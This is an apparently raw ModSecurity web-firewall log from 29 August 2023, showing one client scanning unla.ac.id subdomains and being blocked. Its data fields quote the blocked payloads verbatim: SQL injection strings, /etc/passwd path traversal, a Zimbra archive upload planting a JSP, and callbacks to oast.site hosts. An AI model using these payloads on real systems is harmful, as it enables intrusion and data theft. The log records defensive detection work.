"PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAARQ4HEAAAAB"]
[Tue Aug 29 11:34:13.324736 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RcCo-f0AAASNzpwAAAAQ"]
[Tue Aug 29 11:34:13.329550 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAAPLwGgAAAAX"]
[Tue Aug 29 11:34:13.331069 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAAPDoNEAAAAP"]
[Tue Aug 29 11:34:13.341390 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASS7@UAAAAY"]
[Tue Aug 29 11:34:13.347499 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASGMtoAAAAA"]
[Tue Aug 29 11:34:13.351914 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAAPDoNIAAAAP"]
[Tue Aug 29 11:34:14.557455 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11RsCo-f0AAAPLwG4AAAAX"]
[Tue Aug 29 11:34:15.320801 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgefgz79tbz9ug6.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgefgz79tbz9ug6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAPLwG8AAAAX"]
[Tue Aug 29 11:34:15.347668 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg95tgosetofbr8.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg95tgosetofbr8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAPDoNgAAAAP"]
[Tue Aug 29 11:34:15.348444 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgmdexsnsr98byt.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmdexsnsr98byt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAQKOuAAAAAs"]
[Tue Aug 29 11:34:15.349050 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgcm667x544qfts.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgcm667x544qfts.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAARjjWMAAAAL"]
[Tue Aug 29 11:34:15.350126 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASI0BsAAAAG"]
[Tue Aug 29 11:34:15.350247 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASS7@kAAAAY"]
[Tue Aug 29 11:34:15.369488 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAAShCWcAAAAi"]
[Tue Aug 29 11:34:15.372659 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASEJUIAAAAE"]
[Tue Aug 29 11:34:15.380907 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASGMuEAAAAA"]
[Tue Aug 29 11:34:15.381026 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgpa4nx1ocdjnw5.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgpa4nx1ocdjnw5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAPDoNkAAAAP"]
[Tue Aug 29 11:34:16.327402 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAAPDoNsAAAAP"]
[Tue Aug 29 11:34:16.346851 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuMAAAAA"]
[Tue Aug 29 11:34:16.347141 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuMAAAAA"]
[Tue Aug 29 11:34:16.371597 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAAPDoN0AAAAP"]
[Tue Aug 29 11:34:16.372138 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAARjjWgAAAAL"]
[Tue Aug 29 11:34:16.372645 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASLqEIAAAAM"]
[Tue Aug 29 11:34:16.373238 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASVoIwAAAAe"]
[Tue Aug 29 11:34:16.385030 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASI0CAAAAAG"]
[Tue Aug 29 11:34:16.387164 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "ft.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAShCWsAAAAi"]
[Tue Aug 29 11:34:16.387197 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAShCWsAAAAi"]
[Tue Aug 29 11:34:16.392723 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "informatika.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASLqEMAAAAM"]
[Tue Aug 29 11:34:16.392762 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASLqEMAAAAM"]
[Tue Aug 29 11:34:16.392831 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASVoI0AAAAe"]
[Tue Aug 29 11:34:16.393145 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgxb98azruyurhj.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgxb98azruyurhj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11SMCo-f0AAARjjWkAAAAL"]
[Tue Aug 29 11:34:16.395152 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASHh70AAAAD"]
[Tue Aug 29 11:34:16.397348 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "journal.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAPDoN4AAAAP"]
